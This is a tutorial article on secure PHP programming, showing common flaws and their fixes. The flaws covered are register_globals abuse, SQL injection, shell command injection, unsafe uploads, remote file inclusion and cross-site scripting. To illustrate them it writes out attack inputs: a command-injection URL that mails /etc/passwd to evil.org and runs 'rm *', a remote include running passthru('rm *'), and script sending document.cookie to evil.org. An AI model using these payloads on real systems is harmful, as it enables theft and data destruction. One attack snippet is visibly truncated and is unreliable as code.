Programming PHP with Security in Mind

by Nuno Loureiro

From time to time, you will find a security advisory about some major web application on security mailing lists. Most of the time, the problem is fixed easily. The errors often occur because the author had five minutes to write the application while the boss was yelling, was distracted while developing it, or simply did not have enough practice in programming secure web applications.

Writing a secure web application is not an easy task, because the real problem is not a matter of knowledge but one of practice. It is a good idea to keep some tips in mind when programming. To help memorize them, you should understand how and why they are so important. Then you can start to change your programming practices in the future. Knowledge of the most common threats and respective modes of attack can go a long way toward increasing security.

This article provides a basis for understanding secure programming with PHP and gives a broader view of the subject. You should keep in mind that these guidelines identify only the most common threats and how to avoid them, reducing the risk of security compromise at the same time.

The basic rule for writing a secure application is: never trust user input. Poorly validated user input constitutes the most severe security vulnerabilities in any web application. In other words, input data should be considered guilty unless proven innocent.

Global Variable Scope

PHP versions prior to 4.2.0 registered by default all kinds of external variables in the global scope. So no variable could be trusted, whether external or internal.

Look at the following example:

<?php
    if (authenticate_user()) {
        $authenticated = true;
    }
    ...

    if (!$authenticated) {
        die("Authorization required");
    }
?>

If you set $authenticated to 1 via GET, like this:

http://example.com/admin.php?authenticated=1

you would pass the last “if” in the previous example.

Thankfully, PHP 4.1.0 introduced several special arrays that are automatically global in any scope, and since version 4.2.0 register_globals is off by default. This means that GET, POST, Cookie, Server, Environment and Session variables are no longer placed in the global scope. The special arrays that help users build PHP applications with register_globals off include $_GET, $_POST, $_COOKIE, $_SERVER, $_ENV, $_REQUEST and $_SESSION.

If the directive register_globals is on, do yourself a favor and turn it off. If you turn it off and then validate all the user input, you have made a big step toward secure programming. In many cases, a type cast is sufficient validation.
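As a minimal sketch of validation by type cast, the helper below reads an integer parameter from a request array such as $_GET. The function name int_param() and the nine-digit limit are assumptions made for illustration, not part of PHP itself.

```php
<?php
// Hypothetical helper: read an integer parameter from a request array
// such as $_GET, returning $default when the parameter is missing or
// is not a plain run of digits.
function int_param(array $input, string $key, int $default = 0): int
{
    if (!isset($input[$key]) || !is_string($input[$key])) {
        return $default;
    }
    // Accept digits only, so "12abc" or "1 OR 1=1" is rejected outright.
    // Nine digits at most keeps the value inside a 32-bit integer.
    if (!preg_match('/^[0-9]{1,9}\z/', $input[$key])) {
        return $default;
    }
    // The cast is safe here because the string is known to be numeric.
    return (int) $input[$key];
}
```

In a script this might be called as $page = int_param($_GET, 'page', 1); so that everything after that line works with a real integer.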

Client-side JavaScript form checks do not make any difference, because an attacker can submit any request, not only one that is available on the form. Here is the earlier authentication example rewritten so that the flag is initialized in the script and kept in $_SESSION:

<?php
    $_SESSION['authenticated'] = false;
    if (authenticate_user()) {
        $_SESSION['authenticated'] = true;
    }
    ...
    if (!$_SESSION['authenticated']) {
        die("Authorization required");
    }
?>

Database Interactions

Most PHP applications use databases, and they use input from a web form to construct SQL query strings. This type of interaction can be a security problem.

Imagine a PHP script that edits data from some table, with a web form that POSTs to the same script. The beginning of the script checks to see if the form was submitted, and if so, it updates the table the user chose.

<?php
    if ($update_table_submit) {
        $db->query("update $table set name=$name");
    }
?>

If you do not validate the variable $table that came from the web form, and if you do not check to see if the $update_table_submit variable came from the form (via $_POST['update_table_submit']), an attacker can set both values via GET to whatever he wants. He could do it like this:

http://example.com/edit.php?update_table_submit=1&table=users+set+password%3Daaa+where+user%3D%27admin%27+%23

which results in the following SQL query:

update users set password=aaa
  where user='admin' # set name=$name

A simple validation for the $table variable would be to check whether its content is alphabetical only, or whether it is only one word (if (count(explode(" ", $table)) == 1) { ... }).
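The alphabetical check can be combined with a list of the tables the script is expected to edit. The sketch below assumes such a list exists; the constant EDITABLE_TABLES, its contents and the function name validate_table() are all hypothetical.

```php
<?php
// Hypothetical list of tables this script is allowed to edit.
const EDITABLE_TABLES = ['users', 'groups', 'articles'];

// Return the table name if it is acceptable, or null otherwise.
function validate_table($table): ?string
{
    // Must be a string made of letters only: one word, with no spaces,
    // quotes or comment characters.
    if (!is_string($table) || !preg_match('/^[A-Za-z]+\z/', $table)) {
        return null;
    }
    // Must also be one of the tables we expect to see.
    return in_array($table, EDITABLE_TABLES, true) ? $table : null;
}
```

With this in place, the query is built only when validate_table($_POST['table']) returns a name. The $name value still has to be quoted and escaped by whatever database layer $db wraps, which is left out here.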

Calling External Programs

Sometimes we need to call external programs (using system(), exec(), popen(), passthru() or the back-tick operator) in our PHP scripts. One of the most dangerous security threats is calling external programs if the program name or its arguments are based on user input. In fact, the PHP manual page for most of these functions includes a note that warns: “If you are going to allow data coming from user input to be passed to this function, then you should be using escapeshellarg() or escapeshellcmd() to make sure that users cannot trick the system into executing arbitrary commands.”

Imagine the following example:

<?php
    $fp = popen('/usr/sbin/sendmail -i '. $to, 'w');
?>

The user can control the content of the variable $to above in the following manner:

http://example.com/send.php?to=evil%40evil.org+%3C+%2Fetc%2Fpasswd%3B+rm+%2A

The result of this input would be running this command:

/usr/sbin/sendmail -i evil@evil.org < /etc/passwd; rm *

A simple solution to resolve this security problem is:

<?php
    $fp = popen('/usr/sbin/sendmail -i '.
                escapeshellarg($to), 'w');
?>

Better still, also check with a regexp that the content of the $to variable is a valid e-mail address.
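The two measures can be combined, as in the sketch below. The function name sendmail_command() is hypothetical, and the pattern is a deliberately conservative assumption rather than a complete check of e-mail address syntax.

```php
<?php
// Build the sendmail command line for a recipient, or return null when
// the value does not look like a plain e-mail address.
function sendmail_command($to): ?string
{
    // Conservative pattern (an assumption, not a full RFC 5322 check):
    // local part, "@", dotted domain. It allows no spaces or shell
    // metacharacters, and no leading "-" that sendmail could read as
    // an option.
    $pattern = '/^[A-Za-z0-9][A-Za-z0-9._+-]*@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+\z/';
    if (!is_string($to) || !preg_match($pattern, $to)) {
        return null;
    }
    // Quote the argument anyway, so validation and escaping back each
    // other up.
    return '/usr/sbin/sendmail -i ' . escapeshellarg($to);
}
```

A script would pass the returned string to popen() only when it is not null, and reject the request otherwise.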

File Upload

User-uploaded files also can be problematic because of the way PHP handles them. PHP will define a variable in the global scope that has the same name as the file input tag in the submitted web form. Then, it will create this file with the uploaded file content, but it will not check whether the filename is valid or is the uploaded file.

<?php
    if ($upload_file && $fn_type == 'image/gif' &&
            $fn_size < 100000) {
        copy($fn, 'images/');
        unlink($fn);
    }
?>
<form method="post" name="fileupload"
 action="fupload.php" enctype="multipart/form-data">
File: <input type="file" name="fn">
<input type="submit" name="upload_file"
 value="Upload">
</form>

A malicious user could create his own form specifying the name of some other file that contains sensitive information and submit it, resulting in the processing of that other file. For example,

<form method="post" name="fileupload"
 action="fupload.php">
<input type="hidden" name="fn"
 value="/var/www/html/index.php">
<input type="hidden" name="fn_type"
 value="image/gif">
<input type="hidden" name="fn_size"
 value="22">
<input type="submit" name="upload_file"
 value="Upload">
</form>

The above input would result in moving the file /var/www/html/index.php to images/.

A solution for this problem is to use move_uploaded_file() or is_uploaded_file(). However, there are some other problems with user-uploaded files. Imagine that you have a web application that lets users upload images smaller than 100KB. In this case, even using move_uploaded_file() or is_uploaded_file() would not solve the problem. The attacker still could submit his form specifying the file size, as in the prior example. The solution here is to use the super-global array $_FILES to check user-uploaded file information:

<?php
    // Read the submit flag from $_POST, not from a global variable.
    if (isset($_POST['upload_file']) &&
        $_FILES['fn']['type'] == 'image/gif' &&
        $_FILES['fn']['size'] < 100000) {
            move_uploaded_file(
                $_FILES['fn']['tmp_name'],
                'images/');
    }
?>
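The type entry in $_FILES is reported by the browser, so a stricter script may also want to look at the file itself. The sketch below checks the size on disk and the six-byte GIF signature; the function name is_small_gif() is hypothetical, and a signature check shows only that the file starts like a GIF, not that it is a well-formed image.

```php
<?php
// Return true if $path is a regular file smaller than $maxBytes whose
// first six bytes are one of the two GIF signatures.
function is_small_gif(string $path, int $maxBytes = 100000): bool
{
    if (!is_file($path) || filesize($path) >= $maxBytes) {
        return false;
    }
    // Read only the first six bytes of the file.
    $header = file_get_contents($path, false, null, 0, 6);
    return $header === 'GIF87a' || $header === 'GIF89a';
}
```

In an upload handler this would be called on $_FILES['fn']['tmp_name'] before move_uploaded_file(), with the destination filename chosen by the script and not taken from the request.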

Include Files

In PHP you can include local or remote files by using include(), include_once(), require() and require_once(). This is a good feature, because it allows you to have separate files for classes, reused code and so on, increasing the maintainability and readability of your code.

The concept of including remote files is dangerous in itself, though, because the remote site could be compromised or the network connection could be spoofed. In either scenario, you are injecting unknown and possibly hostile code directly into your script.

Including files presents some other problems, especially if you include files whose filename or path is based on user input. Imagine a script that includes several HTML files and displays them in the proper layout:

<?php
include($layout);
?>

If someone were to pass the $layout variable through GET, you probably can figure out what the consequences might be:

http://example.com/leftframe.php?layout=/etc/passwd

or

http://example.com/leftframe.php?layout=http://evil.org/nasty.html

where nasty.html contains a couple lines of code, such as:
<?php
    passthru('rm *');
    passthru('mail
?>

To avoid this possibility, you should validate any variable you use in include(), perhaps with a regexp or against a fixed list of the files the script is meant to include.
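One way to validate the value is to accept only names from a fixed list, so that user input never becomes part of a path. In the sketch below the layout names, the file paths and the function name layout_file() are all hypothetical.

```php
<?php
// Hypothetical map from public layout names to files that may be included.
const LAYOUTS = [
    'left'  => 'layouts/left.html',
    'right' => 'layouts/right.html',
];

// Return the file for the requested layout, or the default one when
// the request is missing or names anything that is not in the map.
function layout_file($requested, string $default = 'left'): string
{
    if (is_string($requested) && array_key_exists($requested, LAYOUTS)) {
        return LAYOUTS[$requested];
    }
    return LAYOUTS[$default];
}
```

The script would then call include(layout_file($_GET['layout'])) after checking that the parameter is set. A request for /etc/passwd or a remote URL simply falls back to the default layout.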

Cross-Site Scripting

Cross-site scripting (CSS) has been receiving a great deal of press attention. A simple search in the BugTraq mail archives retrieved 15 different reports from June 2002 alone, about cross-site scripting vulnerabilities in several applications.

This kind of attack works directly against the users of your site. It does this by tricking the victim into making a specific and carefully crafted HTTP request. This can happen through a link in an HTML e-mail message, in a web-based forum or embedded in a malicious web page. The victim may not know he is making such a request, if the link is embedded into a malicious web page for example, and the attack may not even require user facilitation. That is, when the user's browser receives the page requested, the malicious script is parsed and executed in the security context of the user.

Modern client-side scripting languages also can execute a number of functions that can be dangerous. Although, for example, JavaScript allows only the originating site to access its own private cookies, the attacker can bypass such a restriction by taking advantage of poorly coded scripts.

The common scenario for CSS attacks is when a user is logged in to a web application and has a valid session stored in a session cookie. The attacker constructs a link to the application from an area of the application that doesn't check user input for validity. It essentially processes what the victim requests and returns it.

Here is an example of such a scenario to illustrate my point. Imagine a web-mail application that blindly prints the mail subject in a mailbox list, like this:

<?php
    ...
    echo "<TD> $subject </TD>";
?>

In this case, an attacker could include JavaScript code in an e-mail subject, and it would be executed in the user's browser when he opens the mailbox.

This vulnerability then can be used to steal a user's cookies and allow the attacker to take over the user's session, by including JavaScript code like this:

<script>
self.location.href=
"http://evil.org/cookie-grab.html?cookies="
+escape(document.cookie)
</script>

When the user opens the mailbox, he will be redirected to the URL specified in the JavaScript code, which includes the victim's cookie. The attacker then simply needs to check his web server logs to know the victim's session cookie.

This vulnerability can be fixed by using htmlspecialchars() when printing variables. htmlspecialchars() converts special characters to HTML entities, meaning it will convert the < and > characters from the <script> tag to their respective entities, &lt; and &gt;. When the victim's browser parses the page, it will not do anything dangerous because &lt;script&gt; means simple text to the browser.

So, a possible solution for this type of attack is:

<?php
    ...
    echo "<TD> " . htmlspecialchars($subject) . " </TD>";
?>

Another common scenario involves printing variables blindly to a hidden input section of a web form:

<input type="hidden" name="page"
 value="<?php echo $page; ?>">

Consider the following URL:

http://example.com/page.php?page="><script>self.location.href="http://evil.org/css-attack.html?cookies="+escape(document.cookie)</script>

If the attacker can get us to select a link such as this one, it is possible that our browser will be redirected to the attacker's site, as in the previous example. But because the variable $page is an integer, you could cast it or use the PHP function intval() to avoid this problem:

<input type="hidden" name="page"
 value="<?php echo intval($page); ?>">

Again, to avoid this kind of attack you always should validate user input or ensure that user-submitted data always is HTML-escaped before displaying it.
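For values that are not integers, the escaping can be wrapped in a small helper. The sketch below is one possible shape; the function names h() and hidden_input() are hypothetical, and the ENT_QUOTES flag is used so that quote characters cannot close the attribute.

```php
<?php
// Escape a value for use in HTML text or inside a quoted attribute.
// ENT_QUOTES converts double and single quotes as well as <, > and &.
function h($value): string
{
    return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
}

// Build a hidden form field with an escaped name and value.
function hidden_input(string $name, $value): string
{
    return '<input type="hidden" name="' . h($name)
         . '" value="' . h($value) . '">';
}
```

Printing hidden_input('page', $_GET['page']) then keeps the payload from the URL above inside the value attribute as plain text.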

Conclusions

I hope these guidelines help you have more secure web applications. The big lessons here are never trust user input, never trust variables that are passed between scripts (as through GET), never trust variables that came from a web form and never trust a variable if it is not initialized in your script. If you cannot initialize a variable in your script, be sure to validate it.

Nuno Loureiro is a cofounder of Ethernet, lda (www.eth.pt). He has been programming PHP for over three years and has coordinated several big web applications. He likes climbing and trekking and can be reached at nuno@eth.pt.